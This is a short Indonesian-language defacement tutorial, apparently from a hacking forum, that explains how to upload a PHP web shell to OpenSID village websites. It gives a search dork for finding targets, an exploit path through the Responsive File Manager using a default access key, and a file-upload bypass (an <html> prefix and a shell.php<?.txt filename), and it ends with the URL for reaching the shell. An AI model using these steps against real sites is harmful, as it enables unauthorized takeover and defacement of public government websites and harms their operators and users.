Tutorial Deface 2021 OpenSID Responsive File Manager - Shell Upload

Hello Brother !

Baaa

Oke Langsung Ae Kymaq

Dork : "OpenSID Nama Daerah"
example : "OpenSID Sarkem"
Exploit : /assets/filemanager/dialog.php?akey=GantiKunciDesa

-BurpSuite
-Mozilla Firefox / Chrome

Kalo Langsung Upshell gabisa ya gan.

tadi gw pake Method Inject Source php ke Image
pas anu, tetep gagal Huft ! inject file name juga gagal :v
ntah kenapa dahh

Solved : atas <?php gw kasih embel" <html>
sama filename w ubah jadi shell.php<?.txt
ntar ke upload sebagai php

Akses Shell ?

localhost/desa/upload/media/shell.php

Sekian, Thank's

-crusher.